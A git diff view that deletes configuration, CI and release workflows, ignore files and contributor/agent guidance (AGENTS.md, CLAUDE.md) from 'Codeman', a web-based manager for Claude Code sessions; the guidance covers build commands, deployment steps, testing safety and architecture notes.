Compare commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
915895152c | ||
|
|
7d5b0bec1c |
@@ -1,27 +0,0 @@
|
||||
# Changesets
|
||||
|
||||
Hello and welcome! This folder has been automatically generated by `@changesets/cli`, a build tool that works
|
||||
with multi-package repos, or single-package repos to help you version and publish your code. You can find
|
||||
the full documentation for it [in the repository](https://github.com/changesets/changesets).
|
||||
|
||||
## What is a changeset?
|
||||
|
||||
A changeset is a piece of information about changes made in a branch or commit. It holds three bits of information:
|
||||
|
||||
- What packages need to be released
|
||||
- What semver bump type each package should receive (major / minor / patch)
|
||||
- A summary of the changes
|
||||
|
||||
## How do I create a changeset?
|
||||
|
||||
Run `npx changeset` or create a `.md` file in this directory with the following format:
|
||||
|
||||
```markdown
|
||||
---
|
||||
"codeman": patch
|
||||
---
|
||||
|
||||
Description of changes
|
||||
```
|
||||
|
||||
The frontmatter specifies which package(s) to bump and the bump type. The body is the changelog entry.
|
||||
@@ -1,11 +0,0 @@
|
||||
{
|
||||
"$schema": "https://unpkg.com/@changesets/config@3.1.1/schema.json",
|
||||
"changelog": "@changesets/cli/changelog",
|
||||
"commit": false,
|
||||
"fixed": [],
|
||||
"linked": [],
|
||||
"access": "public",
|
||||
"baseBranch": "master",
|
||||
"updateInternalDependencies": "patch",
|
||||
"ignore": []
|
||||
}
|
||||
@@ -1,12 +0,0 @@
|
||||
root = true
|
||||
|
||||
[*]
|
||||
indent_style = space
|
||||
indent_size = 2
|
||||
end_of_line = lf
|
||||
charset = utf-8
|
||||
trim_trailing_whitespace = true
|
||||
insert_final_newline = true
|
||||
|
||||
[*.md]
|
||||
trim_trailing_whitespace = false
|
||||
@@ -1,96 +0,0 @@
|
||||
name: CI
|
||||
|
||||
on:
|
||||
push:
|
||||
branches: [master, main]
|
||||
pull_request:
|
||||
|
||||
jobs:
|
||||
ci:
|
||||
name: Typecheck & Lint
|
||||
runs-on: ubuntu-latest
|
||||
|
||||
steps:
|
||||
- uses: actions/checkout@v6
|
||||
|
||||
- name: Setup Node.js
|
||||
uses: actions/setup-node@v6
|
||||
with:
|
||||
node-version: 22
|
||||
cache: 'npm'
|
||||
|
||||
- name: Install dependencies
|
||||
run: npm ci
|
||||
|
||||
- name: Check package-lock.json version sync
|
||||
run: npm run check:lockfile
|
||||
|
||||
- name: Type check
|
||||
run: npm run typecheck
|
||||
|
||||
- name: Lint
|
||||
run: npm run lint
|
||||
|
||||
- name: Frontend JS syntax check
|
||||
run: npm run check:frontend-syntax
|
||||
|
||||
- name: Format check
|
||||
run: npm run format:check
|
||||
|
||||
- name: Server boot smoke test
|
||||
run: |
|
||||
set -u
|
||||
if ! command -v tmux >/dev/null; then
|
||||
sudo apt-get update -qq
|
||||
sudo apt-get install -y tmux
|
||||
fi
|
||||
npx tsx src/index.ts web --port 3151 > /tmp/boot.log 2>&1 &
|
||||
SERVER_PID=$!
|
||||
trap "kill $SERVER_PID 2>/dev/null || true" EXIT
|
||||
for i in $(seq 1 30); do
|
||||
if curl -fsS http://localhost:3151/api/status -o /dev/null; then
|
||||
echo "Server booted in ${i}s"
|
||||
exit 0
|
||||
fi
|
||||
if ! kill -0 $SERVER_PID 2>/dev/null; then
|
||||
echo "Server exited before becoming ready. Logs:"
|
||||
cat /tmp/boot.log
|
||||
exit 1
|
||||
fi
|
||||
sleep 1
|
||||
done
|
||||
echo "Server did not respond on /api/status within 30s. Logs:"
|
||||
cat /tmp/boot.log
|
||||
exit 1
|
||||
|
||||
test:
|
||||
name: Unit & integration tests
|
||||
runs-on: ubuntu-latest
|
||||
|
||||
steps:
|
||||
- uses: actions/checkout@v6
|
||||
|
||||
- name: Setup Node.js
|
||||
uses: actions/setup-node@v6
|
||||
with:
|
||||
node-version: 22
|
||||
cache: 'npm'
|
||||
|
||||
- name: Install dependencies
|
||||
run: npm ci
|
||||
|
||||
- name: Install tmux
|
||||
run: |
|
||||
if ! command -v tmux >/dev/null; then
|
||||
sudo apt-get update -qq
|
||||
sudo apt-get install -y tmux
|
||||
fi
|
||||
|
||||
- name: Run unit & integration tests
|
||||
# Excludes the browser-driven mobile suite (test/mobile/**); see config/vitest.ci.config.ts.
|
||||
# Safe in CI: TmuxManager no-ops all shell commands under VITEST (test/setup.ts).
|
||||
run: npm run test:ci
|
||||
|
||||
# Note: The browser-driven mobile suite (test/mobile/**) is excluded from CI —
|
||||
# it needs a live server + chromium + environment-specific PNG baselines.
|
||||
# Run it locally/manually. All other tests run via the `test` job above.
|
||||
@@ -1,66 +0,0 @@
|
||||
name: Release
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
|
||||
concurrency: ${{ github.workflow }}-${{ github.ref }}
|
||||
|
||||
jobs:
|
||||
release:
|
||||
name: Release
|
||||
runs-on: ubuntu-latest
|
||||
permissions:
|
||||
contents: write
|
||||
pull-requests: write
|
||||
steps:
|
||||
- name: Checkout repo
|
||||
uses: actions/checkout@v6
|
||||
|
||||
- name: Setup Node.js
|
||||
uses: actions/setup-node@v6
|
||||
with:
|
||||
node-version: 22
|
||||
cache: npm
|
||||
registry-url: https://registry.npmjs.org
|
||||
|
||||
- name: Install dependencies
|
||||
run: npm ci
|
||||
|
||||
- name: Build
|
||||
run: npm run build
|
||||
|
||||
- name: Create release PR or publish
|
||||
id: changesets
|
||||
uses: changesets/action@v1
|
||||
with:
|
||||
publish: npm run release
|
||||
version: npm run version-packages
|
||||
title: "chore: version packages"
|
||||
commit: "chore: version packages"
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
|
||||
|
||||
- name: Rename release tag to codeman
|
||||
if: steps.changesets.outputs.published == 'true'
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
run: |
|
||||
VERSION=$(node -p "require('./package.json').version")
|
||||
OLD_TAG="aicodeman@${VERSION}"
|
||||
NEW_TAG="codeman@${VERSION}"
|
||||
|
||||
# Update the GitHub release BEFORE deleting the old tag
|
||||
RELEASE_ID=$(gh release view "$OLD_TAG" --json databaseId -q .databaseId 2>/dev/null || true)
|
||||
if [ -n "$RELEASE_ID" ]; then
|
||||
gh api -X PATCH "repos/${{ github.repository }}/releases/${RELEASE_ID}" \
|
||||
-f tag_name="$NEW_TAG" \
|
||||
-f name="$NEW_TAG"
|
||||
fi
|
||||
|
||||
# Retag
|
||||
git tag "$NEW_TAG" "$OLD_TAG" 2>/dev/null || true
|
||||
git tag -d "$OLD_TAG" 2>/dev/null || true
|
||||
git push origin "$NEW_TAG" ":refs/tags/$OLD_TAG" 2>/dev/null || true
|
||||
@@ -1,92 +0,0 @@
|
||||
# Claude Code local files
|
||||
.agents/
|
||||
skills-lock.json
|
||||
|
||||
# Dependencies
|
||||
node_modules/
|
||||
|
||||
# Build output
|
||||
dist/
|
||||
|
||||
# Vendored frontend deps (generated from node_modules by postinstall/build)
|
||||
src/web/public/vendor/
|
||||
|
||||
# Test coverage
|
||||
coverage/
|
||||
|
||||
# E2E test screenshots (keep baselines, ignore current/diffs)
|
||||
test/e2e/screenshots/current/
|
||||
test/e2e/screenshots/diffs/
|
||||
|
||||
# Mobile visual regression failure artifacts
|
||||
test/mobile/snapshots/*.actual.png
|
||||
test/mobile/snapshots/*.diff.png
|
||||
|
||||
# Logs
|
||||
*.log
|
||||
npm-debug.log*
|
||||
|
||||
# OS files
|
||||
.DS_Store
|
||||
Thumbs.db
|
||||
|
||||
# Editor directories
|
||||
.idea/
|
||||
.vscode/
|
||||
*.swp
|
||||
*.swo
|
||||
*~
|
||||
|
||||
# Environment files
|
||||
.env
|
||||
.env.local
|
||||
.env.*.local
|
||||
|
||||
# State files (local to each machine)
|
||||
.claude/ralph-loop.local.md
|
||||
|
||||
# Temporary files
|
||||
*.tmp
|
||||
*.temp
|
||||
|
||||
# Generated output
|
||||
out/
|
||||
screenshots-echo-diag/
|
||||
scripts/remotion/out/
|
||||
|
||||
# Artifacts that should not be tracked
|
||||
test-results/
|
||||
tmp/
|
||||
# Root `public` (a symlink to scripts/remotion/public — local artifact). ANCHORED
|
||||
# with a leading slash so it does NOT also match src/web/public (a bare `public`
|
||||
# would swallow the whole web UI source dir and silently un-stage any new asset
|
||||
# added there). No trailing slash so it still matches the symlink, not just dirs.
|
||||
/public
|
||||
|
||||
# Opt-in gesture overlay runtime assets: large MediaPipe wasm + model (~27 MB)
|
||||
# fetched at build/install by scripts/fetch-gesture-assets.mjs, kept out of git.
|
||||
# (The gesture bundle itself, gesture-codeman.js, IS tracked — built from
|
||||
# packages/gesture-control source by `npm run build:gesture`.)
|
||||
src/web/public/gesture/wasm/
|
||||
src/web/public/gesture/*.task
|
||||
|
||||
# Gesture-control workspace package build outputs (source is tracked; the
|
||||
# Codeman bundle is emitted to src/web/public/gesture/gesture-codeman.js instead).
|
||||
packages/gesture-control/dist/
|
||||
packages/gesture-control/dist-codeman/
|
||||
packages/gesture-control/.vite/
|
||||
|
||||
# Claude Code plan tracking
|
||||
plan.json
|
||||
|
||||
# Unfinished TUI (local development only)
|
||||
src/tui/
|
||||
.claude/
|
||||
media-assets/
|
||||
commands
|
||||
todo.md
|
||||
@fix_plan.md
|
||||
readme-preview.mjs
|
||||
|
||||
# Uploaded images land here under each session working dir (runtime artifact)
|
||||
.claude-images/
|
||||
@@ -1,28 +0,0 @@
|
||||
dist/
|
||||
coverage/
|
||||
node_modules/
|
||||
src/web/public/vendor/
|
||||
src/web/public/gesture/
|
||||
src/web/public/app.js
|
||||
src/web/public/styles.css
|
||||
src/web/public/mobile.css
|
||||
src/web/public/index.html
|
||||
# Hand-formatted public JS modules (never prettier-enforced; the new
|
||||
# check-public-assets.mjs still validates NUL bytes + JS syntax on these).
|
||||
src/web/public/constants.js
|
||||
src/web/public/image-input.js
|
||||
src/web/public/input-cjk.js
|
||||
src/web/public/keyboard-accessory.js
|
||||
src/web/public/notification-manager.js
|
||||
src/web/public/orchestrator-panel.js
|
||||
src/web/public/panels-ui.js
|
||||
src/web/public/ralph-panel.js
|
||||
src/web/public/ralph-wizard.js
|
||||
src/web/public/respawn-ui.js
|
||||
src/web/public/session-ui.js
|
||||
src/web/public/settings-ui.js
|
||||
src/web/public/sw.js
|
||||
src/web/public/terminal-ui.js
|
||||
src/web/public/voice-input.js
|
||||
src/web/public/upload.html
|
||||
scripts/remotion/
|
||||
@@ -1,8 +0,0 @@
|
||||
{
|
||||
"singleQuote": true,
|
||||
"semi": true,
|
||||
"tabWidth": 2,
|
||||
"printWidth": 120,
|
||||
"trailingComma": "es5",
|
||||
"endOfLine": "lf"
|
||||
}
|
||||
@@ -1,16 +0,0 @@
|
||||
# Repository Guidelines
|
||||
|
||||
Canonical agent/contributor guidance for this repository lives in [CLAUDE.md](CLAUDE.md) —
|
||||
project structure, build/test/lint commands, code style, testing safety rules
|
||||
(never run the full suite inside a managed tmux session), security notes, and
|
||||
the deployment workflow are all maintained there. Please read it before making
|
||||
changes, and keep it the single source of truth rather than duplicating
|
||||
sections here.
|
||||
|
||||
Quick pointers:
|
||||
|
||||
- Type check: `tsc --noEmit` · Lint: `npm run lint` · Format: `npm run format:check`
|
||||
- Targeted tests only: `npm test -- test/<file>.test.ts` (bare `npm test` is unsafe in managed sessions)
|
||||
- Route tests use `app.inject()`; new tests needing ports must pick a unique `const PORT =`
|
||||
- Branch off `master` for all work; Conventional Commit-style messages (`fix(mobile): ...`)
|
||||
- Never commit secrets or local state from `~/.codeman/`
|
||||
@@ -1,308 +0,0 @@
|
||||
# CLAUDE.md
|
||||
|
||||
This file provides guidance to Claude Code (claude.ai/code) when working with code in this repository.
|
||||
|
||||
## Quick Reference
|
||||
|
||||
| Task | Command |
|
||||
|------|---------|
|
||||
| Dev server | `npm run dev` (or `npx tsx src/index.ts web`) |
|
||||
| Type check | `tsc --noEmit` |
|
||||
| Lint | `npm run lint` (fix: `npm run lint:fix`) |
|
||||
| Format | `npm run format` (check: `npm run format:check`) |
|
||||
| Single test | `npm test -- test/<file>.test.ts` (or `npx vitest run --config config/vitest.config.ts test/<file>.test.ts`) — ⚠ **never** run bare `npm test`, see Testing section |
|
||||
| Build | `npm run build` (esbuild via `scripts/build.mjs`, NOT tsc — `tsc --noEmit` is type-check only) |
|
||||
| Production | `npm run build && systemctl --user restart codeman-web` |
|
||||
|
||||
## CRITICAL: Session Safety
|
||||
|
||||
**You may be running inside a Codeman-managed tmux session.** Before killing ANY tmux or Claude process:
|
||||
|
||||
1. Check: `echo $CODEMAN_MUX` - if `1`, you're in a managed session
|
||||
2. **NEVER** run `tmux kill-session`, `pkill tmux`, or `pkill claude` without confirming
|
||||
3. Use the web UI or `./scripts/tmux-manager.sh` instead of direct kill commands
|
||||
|
||||
## CRITICAL: Always Test Before Deploying
|
||||
|
||||
**NEVER COM without verifying your changes actually work.** For every fix:
|
||||
|
||||
1. **Backend changes**: Hit the API endpoint with `curl` and verify the response
|
||||
2. **Frontend changes**: Use Playwright to load the page and assert the UI renders correctly. Use `waitUntil: 'domcontentloaded'` (not `networkidle` — SSE keeps the connection open). Wait 3-4s for polling/async data to populate, then check element visibility, text content, and CSS values
|
||||
3. **Only after verification passes**, proceed with COM
|
||||
|
||||
The production server caches static files for 1 year, `immutable` (`maxAge: '1y'` in `server.ts`). To avoid stale frontend after a deploy, `renderIndexHtml` runs `cacheBustAssets(html)` — it appends `?v=<mtime>` to **every same-origin `.js`/`.css`** reference (mtime memoized ~1s so a burst of renders is cheap; external/already-versioned/missing refs untouched). Because `index.html` is served `no-cache`, a **normal reload now picks up edited modules/styles — no hard refresh needed** (the gesture bundle is injected separately with its own `?v=`). If you add an asset referenced by an *absolute* URL or from JS rather than a `<script>/<link>` tag, it won't be auto-busted.
|
||||
|
||||
## COM Shorthand (Deployment)
|
||||
|
||||
Uses [Semantic Versioning](https://semver.org/) (`MAJOR.MINOR.PATCH`) via `@changesets/cli`. What SemVer actually covers (the CLI + documented env vars are public; the HTTP/SSE API, on-disk state, and experimental features are internal/unstable) is defined in `docs/versioning-policy.md`. Security reporting + known limitations live in `SECURITY.md`.
|
||||
|
||||
When user says "COM":
|
||||
1. **Determine bump type**: `COM` = patch (default), `COM minor` = minor, `COM major` = major
|
||||
2. **Create a changeset file** (no interactive prompts). Write a `.md` file in `.changeset/` with a random filename:
|
||||
```bash
|
||||
cat > .changeset/$(openssl rand -hex 4).md << 'CHANGESET'
|
||||
---
|
||||
"aicodeman": patch
|
||||
---
|
||||
|
||||
Detailed description of ALL changes since last release (not just the most recent commit — review full git log since last version tag)
|
||||
CHANGESET
|
||||
```
|
||||
Replace `patch` with `minor` or `major` as needed. Include `"xterm-zerolag-input": patch` on a separate line if that package changed too.
|
||||
3. **Consume the changeset**: `npm run version-packages` (auto-bumps `package.json` files, updates `CHANGELOG.md`, runs `npm install --package-lock-only`, and verifies lockfile sync via `scripts/check-lockfile-sync.mjs` — all in one command; never hand-edit `CHANGELOG.md` or `package-lock.json` versions)
|
||||
4. **Sync CLAUDE.md version**: Update the `**Version**` line below to match the new version from `package.json`
|
||||
5. **Commit and deploy**: `git add -A && git commit -m "chore: version packages" && git push && npm run build && systemctl --user restart codeman-web`
|
||||
6. **Wait for CI**: after `git push`, TWO workflows fire per master push — `CI` and `Release` (the npm publish + GitHub release). List both runs for the pushed commit with `gh run list --commit $(git rev-parse HEAD) --json databaseId,workflowName` and watch EACH with `gh run watch <id> --exit-status`. Confirm both pass before considering the release done (`gh run list -L 1` returns only one of the two).
|
||||
|
||||
CI runs `npm run check:lockfile` on every push/PR, so lockfile drift fails the build even if the `version-packages` script is bypassed.
|
||||
|
||||
**Version**: 1.3.2 (must match `package.json`)
|
||||
|
||||
## Project Overview
|
||||
|
||||
Codeman is a Claude Code session manager with web interface and autonomous Ralph Loop. Spawns Claude CLI via PTY, streams via SSE, supports respawn cycling for 24+ hour autonomous runs.
|
||||
|
||||
**Tech Stack**: TypeScript (ES2022/NodeNext, strict mode), Node.js, Fastify, node-pty, xterm.js. Supports Claude Code, OpenCode, Codex (OpenAI), and Gemini (Google) CLIs via pluggable CLI resolvers (`SessionMode = 'claude' | 'shell' | 'opencode' | 'codex' | 'gemini'`).
|
||||
|
||||
**TypeScript Strictness** (see `tsconfig.json`): `noUnusedLocals`, `noUnusedParameters`, `noImplicitReturns`, `noImplicitOverride`, `noFallthroughCasesInSwitch`, `allowUnreachableCode: false`, `allowUnusedLabels: false`.
|
||||
|
||||
**Requirements**: Node.js 22+, Claude CLI, tmux
|
||||
|
||||
**Git**: Main branch is `master`. SSH session chooser: `sc` (interactive), `sc 2` (quick attach), `sc -l` (list).
|
||||
|
||||
## Additional Commands
|
||||
|
||||
`npm run dev` = dev server. Default port: `3000` (override with `--port` or the `CODEMAN_PORT` env var). To run this beta isolated alongside a prod Codeman, use `scripts/run-beta.sh` (sets `CODEMAN_INSTANCE=beta` + `CODEMAN_PORT=5000`). Commands not in Quick Reference:
|
||||
|
||||
| Task | Command |
|
||||
|------|---------|
|
||||
| Dev with TLS | `npx tsx src/index.ts web --https` |
|
||||
| Override window title hostname | `npx tsx src/index.ts web --title-hostname <name>` (default: `os.hostname()` — `codeman:<name>` is used for tab title, title-flash, and OS desktop notification prefix) |
|
||||
| Bind a non-loopback host | `npx tsx src/index.ts web --host 0.0.0.0` (or `-H`; env `CODEMAN_HOST`; default `127.0.0.1`). Without `CODEMAN_PASSWORD` it **starts but warns loudly** — see Common Gotchas + `docs/security-architecture.md` |
|
||||
| Continuous typecheck | `tsc --noEmit --watch` |
|
||||
| Watch-mode test | `npm run test:watch -- test/<file>.test.ts` (always pass a file — bare watch includes the browser suites) |
|
||||
| Test coverage | `npm run test:coverage` |
|
||||
| Dead-code sweep | `npm run knip` (config in `knip.json`) |
|
||||
| Rebuild gesture overlay | `npm run build:gesture` (esbuild `packages/gesture-control/src/codeman/entry.ts` → `src/web/public/gesture/gesture-codeman.js`; commit the result) |
|
||||
| Gesture playground | `npm run dev` **in** `packages/gesture-control/` (standalone vite demo, fake tabs) |
|
||||
| Check public-asset formatting | `npm run check:public-assets` (prettier-checks `src/web/public/**` text assets; `scripts/check-public-assets.mjs`) |
|
||||
| Frontend JS syntax check | `npm run check:frontend-syntax` (`scripts/check-frontend-syntax.mjs`; runs in CI) |
|
||||
| CI-equivalent test sweep | `npm run test:ci` (full suite minus browser/perf — see Testing) |
|
||||
| Production start | `npm run start` |
|
||||
| Production logs | `journalctl --user -u codeman-web -f` |
|
||||
|
||||
**CI**: `.github/workflows/ci.yml` (push to master/main + PRs, Node 22) runs two jobs: **(1)** `check:lockfile`, `typecheck`, `lint`, `check:frontend-syntax`, `format:check`, then a **server boot smoke test** (`tsx src/index.ts web --port 3151` must answer `/api/status` within 30s); **(2)** the **unit/integration test suite** via `npm run test:ci` (`config/vitest.ci.config.ts` — excludes the browser-driven `test/mobile/**` suite, `perf-*` benchmarks, and 3 Playwright tests). Tests are tmux-safe in CI: `TmuxManager` no-ops all shell commands under `VITEST` (see Testing).
|
||||
|
||||
**Code style**: Prettier (`singleQuote: true`, `printWidth: 120`, `trailingComma: "es5"`). ESLint flat config (`config/eslint.config.js`) allows `no-console`, warns on `@typescript-eslint/no-explicit-any`. Ignores: `app.js`, `scripts/**/*.mjs`, `src/web/public/vendor/**`, `scripts/remotion/**`.
|
||||
|
||||
## Common Gotchas
|
||||
|
||||
- **Single-line prompts only** — `writeViaMux()` sends text+Enter separately; multi-line breaks Ink
|
||||
- **ESM only** — Never `require()`, use `await import()`. `tsx` masks CJS/ESM issues in dev but production breaks
|
||||
- **Package ≠ product name** — npm: `aicodeman`, product: **Codeman**. Release renames tags accordingly. Both `aicodeman` and `codeman` bin aliases are installed (`package.json` `bin`)
|
||||
- **Global regex `lastIndex`** — Shared `g`-flag patterns in loops must reset `lastIndex = 0` first, or use the `execPattern()` helper in `utils/regex-patterns.ts` (resets automatically)
|
||||
- **`envOverrides` flow `CLAUDE_CODE_*` / `OPENCODE_*` / `CODEX_*` / `GEMINI_*` / `GOOGLE_*` env vars** — Set via `POST /api/sessions { envOverrides }`, stored on `Session._envOverrides`, exported by `tmux-manager.buildEnvExports()` at spawn time, persisted in `SessionState.envOverrides`. **Do NOT** write these to `<case>/.claude/settings.local.json` — that's the old path and creates UI/disk drift. (`GOOGLE_*` is the deliberately-broad Vertex-AI namespace for Gemini — see Multi-CLI prefix discipline.)
|
||||
- **Effort is NOT an env var** — never carry effort as `CLAUDE_CODE_EFFORT_LEVEL`: the env var hard-locks effort and blocks in-session `/effort` switching (incl. ultracode). It flows as the dedicated `effort` payload field → `Session._effort` → `claude --effort <level>` for regular levels incl. `max` (the settings `effortLevel` key is `enum(["low","medium","high","xhigh"]).catch(undefined)` — `max` gets SILENTLY dropped there), or `claude --settings '{"ultracode":true}'` for ultracode (rejected by `--effort`). Both are soft defaults the user can override anytime. Legacy env-var entries are auto-migrated by the Session constructor and unset from tmux sessions in `applyEnvOverrides()`. See `buildEffortCliArgs()` in `session-cli-builder.ts`, tests in `test/effort-injection.test.ts`
|
||||
- **Model choice flows via `settings.local.json`, NOT `--model` or env** — the App Settings **Claude Model** picker (`claudeModel` in `settings.json`) is read by `session-ui.js` at session create (wins over the legacy 1M-Opus toggles `opusContext1m`/`opusContext1mEnabled`), sent as the `modelOverride` payload field, and `updateCaseModel()` (`hooks-config.ts`) writes/deletes the `model` key in `<case>/.claude/settings.local.json`. This is the intended exception to the envOverrides rule above: model legitimately lives in `settings.local.json` (a soft default — in-session `/model` still works); env vars do not
|
||||
- **Multi-CLI prefix discipline** — Codeman supports Claude Code, OpenCode, Codex, and Gemini (`claude-cli-resolver.ts` / `opencode-cli-resolver.ts` / `codex-cli-resolver.ts` / `gemini-cli-resolver.ts`); env-var prefix is CLI-specific (`CLAUDE_CODE_*` vs `OPENCODE_*` vs `CODEX_*` vs `GEMINI_*`) and the `ALLOWED_ENV_PREFIXES` allowlist in `schemas.ts` enforces this. Gemini additionally allowlists the **broad `GOOGLE_*`** namespace (intentional — Vertex AI auth uses `GOOGLE_CLOUD_PROJECT`/`GOOGLE_APPLICATION_CREDENTIALS`/`GOOGLE_GENAI_USE_VERTEXAI` etc.; it's the loosest allowlist entry, affecting only the user's own spawned CLI). When adding settings, decide which CLI(s) it applies to and gate the env export accordingly — don't blindly forward all prefixes. See `docs/opencode-integration.md` for the resolver design pattern
|
||||
- **Zod `.optional()` rejects `null`** — accepts `undefined` only. When the frontend builds a request body with `JSON.stringify`, an explicit `null` field is preserved on the wire and fails validation with `INVALID_INPUT`. Convert `null` → `undefined` before stringifying (e.g. `field: value ?? undefined`), or declare the schema `.nullish()`. Real bugs caused: 0.6.4 (`durationMinutes` for ∞ respawn), and the same shape pattern hit `opusContext1mEnabled` in 0.6.3
|
||||
- **`xterm-zerolag-input` is single-source — edit the package, then rebuild the bundle** — the local-echo overlay source lives ONLY in `packages/xterm-zerolag-input/src/` (`zerolag-input-addon.ts`; also published to npm as a standalone library — see README "Published Packages"). It is bundled (esbuild → IIFE, with appended `window.LocalEchoOverlay` aliases) into the **gitignored** `src/web/public/vendor/xterm-zerolag-input.js` by `scripts/postinstall.js` (for dev/`tsx`) and into `dist/.../vendor/` by `scripts/build.mjs` (the `xterm-zerolag-input` esbuild step, for prod). `app.js` only **consumes** it via `new LocalEchoOverlay(terminal)` — there is NO inline copy to keep in sync. So: change behavior in the package source, then re-run the bundle step (`npm install` reruns postinstall; `npm run build` for prod); **never hand-edit `app.js` for overlay behavior or commit the gitignored vendor bundle**. A public-API break in the package still warrants a separate `xterm-zerolag-input` version bump in the changeset. Always test on mobile after touching it. See `docs/local-echo-overlay-plan.md`.
|
||||
- **Default bind is loopback-only; non-loopback without a password starts but warns** — since COD-29 (PR #107) the web server defaults to `--host 127.0.0.1` (was `0.0.0.0`). As of **0.9.0** binding a non-loopback host (`--host`/`-H`/`CODEMAN_HOST`) without `CODEMAN_PASSWORD` **no longer refuses to start — it starts and prints a loud warning** listing the fixes (set `CODEMAN_PASSWORD`, bind loopback + tunnel/`tailscale serve`, or `--allow-unauthenticated-network` / `CODEMAN_ALLOW_UNAUTHENTICATED_NETWORK=1` to acknowledge → terser note). Host classification is `isLoopbackBindHost()` in `network-auth-policy.ts`; the warn-vs-start logic is in `server.ts` `start()`; flags wired in `cli.ts`. ⚠️ Operational note: the production systemd unit runs `node dist/index.js web --https` with no `--host`, so it binds **localhost only** — reach it remotely via `tailscale serve`/tunnel to `127.0.0.1`, or add `Environment=CODEMAN_HOST=0.0.0.0` + `Environment=CODEMAN_PASSWORD=…` to `~/.config/systemd/user/codeman-web.service`. A loopback bind is reachable through a same-host tunnel (cloudflared/tailscale → `127.0.0.1`) but NOT by a browser hitting the box's LAN IP. Auth user defaults to `admin`. **Full model: `docs/security-architecture.md`.**
|
||||
- **Instance isolation / multi-instance attach danger** — data dir (`~/.codeman`) and tmux socket (`tmux -L codeman`) are PROCESS-WIDE and shared by every Codeman on the machine, derived from `CODEMAN_INSTANCE` via `src/config/instance.ts` (`getDataDir()`/`dataPath()`/`DEFAULT_TMUX_SOCKET`). ⚠️ A 2nd instance on the SAME socket **discovers and attaches PTYs to the first instance's live sessions** (`tmux -L codeman attach-session …`), resizing/mutating them — `$HOME` isolation is NOT enough (tmux is system-global). To run two instances, give each a distinct `CODEMAN_INSTANCE` (scopes BOTH dir+socket: `~/.codeman-<name>` + `-L codeman-<name>`), or set `CODEMAN_TMUX_SOCKET` + `CODEMAN_DATA_DIR` individually. **`CODEMAN_INSTANCE` defaults to empty = the production layout (`~/.codeman`, `-L codeman`, port 3000)**, so this branch is safe to ship to master without disturbing existing installs. To run THIS beta alongside prod, launch with `scripts/run-beta.sh` (`CODEMAN_INSTANCE=beta` + `CODEMAN_PORT=5000`) — it never collides with prod's data dir/socket/port. Any new `~/.codeman/...` path MUST go through `dataPath()`, never `join(homedir(), '.codeman', …)`.
|
||||
- **Headless screenshots: `deviceScaleFactor` MUST be 1, and write unique filenames** — `scripts/capture-real-overview.mjs` (drives a live session in headless Chromium → overview PNG). Two traps, both observed 2026-06-14: **(1) DSF=2 doubles the console font.** xterm's WebGL renderer draws terminal glyphs at ~2× their nominal size under `deviceScaleFactor: 2`, while STILL reporting nominal cell dims (`terminal.cols`/`_renderService.dimensions.css.cell` say 8px/187cols — they lie), so it's invisible to any internal measurement and only the pixels reveal it. The HTML chrome (header/toolbar) is unaffected → ONLY the console font looks comically large. Default to **DSF=1** (script does); the image is 1× res but the font is true-to-browser. **(2) Stable filenames → stale renders.** Overwriting a fixed path (`claude-overview.png`) in place leaves OS image viewers (eog/feh) — and any HTTP client behind a long/`immutable` cache — showing the OLD render; the user reads it as "the fix didn't work". The script now mints a timestamped `claude-overview-<ts>.png` per run. ⚠️ This was a LOCAL image-viewer cache, NOT a Codeman serving bug: `file-routes` previews send `Cache-Control: no-cache` and `/api/screenshots/:name` sends none. The one real Codeman-side footgun: `server.ts` serves non-content-hashed static assets `public, max-age=31536000, immutable`, and `cacheBustAssets()` only rewrites `.js`/`.css` refs — a stable-named **image** referenced from public/ would go stale on overwrite. Reflect the per-device UI to match a real device when capturing: seed `localStorage` `codeman:skin`, `codeman-font-size`, and the desktop `codeman-app-settings` blob (the plan-usage chip is a per-device display key deleted from the server payload — a fresh browser hides it unless seeded; close side panels for a full-width terminal).
|
||||
|
||||
**Import conventions**: Utils from `./utils`, types from `./types` (barrel), config from specific `./config/*` files.
|
||||
|
||||
## Architecture
|
||||
|
||||
### Core Files (by domain)
|
||||
|
||||
| Domain | Key files | Notes |
|
||||
|--------|-----------|-------|
|
||||
| **Entry** | `src/index.ts`, `src/cli.ts` | |
|
||||
| **Session** | `src/session.ts` ★, `src/session-manager.ts`, `src/session-auto-ops.ts`, `src/session-cli-builder.ts`, `src/session-lifecycle-log.ts`, `src/session-task-cache.ts`, `src/session-pty-exit-breaker.ts`, `src/usage-limit-patterns.ts`, `src/usage-telemetry.ts`; `src/services/unified-session-service.ts` (merges live/persisted/lifecycle/transcript rows for `GET /api/sessions/unified`) | |
|
||||
| **Mux** | `src/mux-interface.ts`, `src/mux-factory.ts`, `src/tmux-manager.ts` ★ | |
|
||||
| **Respawn** | `src/respawn-controller.ts` ★ + 4 helpers (`-adaptive-timing`, `-health`, `-metrics`, `-patterns`) | Read `docs/respawn-state-machine.md` first |
|
||||
| **Ralph** | `src/ralph-tracker.ts` ★, `src/ralph-loop.ts` + 5 helpers (`-config`, `-fix-plan-watcher`, `-plan-tracker`, `-stall-detector`, `-status-parser`) | Read `docs/ralph-wiggum-guide.md` first |
|
||||
| **Orchestrator** | `src/orchestrator-loop.ts`, `src/orchestrator-planner.ts`, `src/orchestrator-verifier.ts` | Read `docs/orchestrator-loop-architecture.md` first |
|
||||
| **Cron** | `src/cron/cron-service.ts`, `src/cron/cron-time.ts` (pure next-run math), `src/cron/cron-input.ts` | Cron-style `CronJob`s. Read `docs/cron-discovery.md` first; distinct from legacy `ScheduledRun` (`/api/scheduled`) — see Key Patterns |
|
||||
| **Agents** | `src/subagent-watcher.ts` ★, `src/team-watcher.ts`, `src/bash-tool-parser.ts`, `src/transcript-watcher.ts`, `src/workflow-run-watcher.ts` | `workflow-run-watcher` is STANDALONE (never touches `subagent-watcher`) — see Key Patterns |
|
||||
| **AI** | `src/ai-checker-base.ts`, `src/ai-idle-checker.ts`, `src/ai-plan-checker.ts` | |
|
||||
| **Tasks** | `src/task.ts`, `src/task-queue.ts`, `src/task-tracker.ts` | |
|
||||
| **State** | `src/state-store.ts`, `src/run-summary.ts`, `src/session-lifecycle-log.ts` | |
|
||||
